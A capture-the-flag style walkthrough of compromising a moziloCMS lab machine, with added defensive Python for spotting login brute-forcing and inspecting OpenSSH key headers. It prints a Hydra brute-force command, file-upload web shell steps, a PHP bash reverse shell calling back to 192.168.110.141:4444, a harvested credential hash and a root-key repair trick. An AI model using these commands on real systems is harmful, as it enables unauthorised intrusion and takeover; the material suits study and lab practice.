This post records a hands-on penetration test of the Lzh target machine. Directory scanning first turned up the site's backup.zip source backup, which confirmed that the target runs moziloCMS. The admin login's front-end form had been disabled after too many failed attempts; Hydra bypasses that front-end restriction and brute-forced the password Admin123. After logging in, the CMS's back-end upload vulnerability (upload a .jpg, then rename it to .php) yielded the initial shell. Credentials for the welcome user were then extracted from a configuration file, and a damaged root SSH private key was found in that user's home directory. By manually restoring the missing Base64 encoding of the standard openssh-key-v1 file header, the key was repaired and privileges were escalated to root.
Information gathering
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds
# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status
Vulnerability analysis
backup.zip turned out to be a backup of the website. It revealed moziloCMS 3.0-3.0.1, whose vulnerability is described as follows:
1. Log in as administrator
2. Go to the "Files" section via the left-hand menu
3. Create a .jpg file containing PHP web shell content
4. Upload the file to the server via the upload icon and save
5. Rename the file to .php on the web server and save
6. Access the web shell via the following endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
First go to the mozilocms directory:
http://192.168.110.133/mozilo/ # main directory
http://192.168.110.133/mozilo/admin/ # admin login page
# after too many attempts, this appears:
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # too much incorrect access data has been entered; input is no longer possible
// Check login data
// initialise the hasher (phpass PasswordHash, cost 2^8, portable hashes disabled)
function checkLoginData($user, $pass) {
    global $loginpassword;
    require_once(BASE_DIR_CMS.'PasswordHash.php');
    $t_hasher = new PasswordHash(8, FALSE);
    // note: there is no attempt counter or delay in this function; the "temporarily blocked"
    // lockout shown above is enforced only by the disabled button in the HTML form
    // check the administrator account
    if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
        return true;
    } elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
        return true; // check the secondary account
    } else {
        return false; // login failed, return false
    }
}
The restriction is only in the front end, which disables the submit button:
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">
So the login can be brute-forced directly against the server:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I
This yields admin:Admin123, which gets us into the admin panel.
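Because the lockout above lives only in the HTML form, the server keeps answering every POST, so the guessing is fully visible in the web server's access log. The following Python is an added example, not part of the original post: it runs a simple detector over constructed Apache combined-format lines for the /mozilo/admin/index.php endpoint and uses the same success signal the Hydra command relies on (a 302 after a run of 200 responses). The sample lines, thresholds and window size are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

LOGIN_PATH = "/mozilo/admin/index.php"
THRESHOLD = 5   # POSTs to the login endpoint from one IP inside WINDOW seconds
WINDOW = 60

# Apache combined log format; the zone offset is dropped before parsing the timestamp.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"])

def detect_login_bruteforce(lines):
    """Return {ip: (total_attempts, got_302)} for IPs sending THRESHOLD or more POSTs to
    LOGIN_PATH within WINDOW seconds; a 302 is the 'login accepted' signal (Hydra's S=302)."""
    events = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            events[rec[0]].append((rec[1], rec[4]))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):            # sliding window over timestamps
            while (evs[end][0] - evs[start][0]).total_seconds() > WINDOW:
                start += 1
            if end - start + 1 >= THRESHOLD:
                findings[ip] = (len(evs), any(st == 302 for _, st in evs))
                break
    return findings

def _line(ip, sec, status):
    """Constructed sample log line (not a real log from the target)."""
    return (f'{ip} - - [14/Dec/2025:06:50:{sec:02d} +0000] "POST {LOGIN_PATH} HTTP/1.1" '
            f'{status} 0 "-" "Mozilla/5.0"')

# Eight rejected attempts (200: login page re-rendered) then one accepted (302) from .141, plus one normal login from .50.
SAMPLE_LOG = [_line("192.168.110.141", s, 200) for s in range(8)] + \
             [_line("192.168.110.141", 8, 302), _line("192.168.110.50", 3, 302)]
```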
Exploitation
Prepare the payload:
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>
Following the steps described above gives a shell; enumerating users turns up welcome.
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it
Privilege escalation
An id_rsa belonging to root was found in welcome's home directory.
However, its first three characters are missing. It is an OpenSSH-format private key, which always begins with the fixed magic string openssh-key-v1\0:
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=
With the header restored, we can log in as root.
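The header that had to be restored follows the openssh-key-v1 layout: the 15-byte magic, then the length-prefixed ciphername, kdfname and kdfoptions strings, then the key count. The Python below is an added example, not from the original post: it parses that header so a defender can flag private keys stored without a passphrase (the underlying weakness here, since a repaired key worked with no passphrase), and it rejects a file whose leading bytes are missing. The sample headers are constructed and contain no key material.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"          # 15 bytes, always first in the decoded blob
BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
END = "-----END OPENSSH PRIVATE KEY-----"

def _read_string(buf, off):
    """Read one SSH wire-format string: uint32 big-endian length, then the bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def build_header(cipher, kdf, kdfoptions=b"", nkeys=1):
    """Assemble only the leading fields of an openssh-key-v1 blob (constructed, no key material)."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    return MAGIC + s(cipher) + s(kdf) + s(kdfoptions) + struct.pack(">I", nkeys)

def to_pem(blob):
    b64 = base64.b64encode(blob).decode()
    return BEGIN + "\n" + "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70)) + "\n" + END + "\n"

def inspect_key(pem_text):
    """Return (ciphername, kdfname, nkeys) from an OpenSSH private key file's header.
    Raises ValueError when the base64 body is truncated (binascii.Error is a ValueError)
    or does not start with the magic, i.e. the damage described in the walkthrough."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if lines[0] != BEGIN or lines[-1] != END:
        raise ValueError("not an OpenSSH private key file")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("openssh-key-v1 magic header missing or corrupted")
    cipher, off = _read_string(blob, len(MAGIC))
    kdf, off = _read_string(blob, off)
    _kdfoptions, off = _read_string(blob, off)
    (nkeys,) = struct.unpack_from(">I", blob, off)
    return cipher.decode(), kdf.decode(), nkeys

def is_passphrase_protected(pem_text):
    """Unencrypted keys carry cipher 'none' and kdf 'none'; anything else needs a passphrase."""
    cipher, kdf, _ = inspect_key(pem_text)
    return cipher != "none" and kdf != "none"

# Constructed sample headers: one unprotected, one bcrypt/aes256-ctr (24 placeholder kdfoptions bytes).
UNENCRYPTED = to_pem(build_header(b"none", b"none"))
ENCRYPTED = to_pem(build_header(b"aes256-ctr", b"bcrypt", kdfoptions=b"\x00" * 24))
```

The base64 body of every such file therefore begins with b3BlbnNzaC1rZXktdjEAAAAA, which is the prefix the post recovers with echo -n 'openssh-key-v1' | base64.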
Lessons learned
I did not read the registration source code carefully, so I did not know the password policy.